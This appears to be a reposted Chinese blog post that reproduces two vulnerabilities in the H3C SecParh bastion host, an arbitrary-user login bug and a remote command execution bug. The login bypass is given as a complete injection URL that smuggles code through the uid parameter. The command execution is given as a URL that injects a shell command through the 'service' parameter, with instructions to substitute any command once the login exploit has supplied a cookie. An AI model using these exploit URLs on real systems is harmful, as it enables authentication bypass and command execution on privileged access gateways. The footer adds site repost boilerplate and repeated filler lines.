H3C SecParh堡垒机任意用户登录与远程执行代码漏洞 1.H3C SecParh堡垒机任意用户登录漏洞1.1.漏洞描述1.2.漏洞影响1.3.漏洞复现1.3.1.登录页面1.3.2.构建
在H3C SecParh堡垒机 get_detail_view.PHP 存在任意用户登录漏洞。
H3C SecParh堡垒机
该漏洞版本的登录页面如下,2018年的。
URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。
H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。
H3C SecParh堡垒机
该漏洞版本的登录页面如下,2018年的。
URL:Https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&fORMat=JSON&browse=true
需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
来源地址:https://blog.csdn.net/weixin_44268918/article/details/128848888
--结束END--
本文标题: H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
本文链接: https://lsjlt.com/news/388330.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0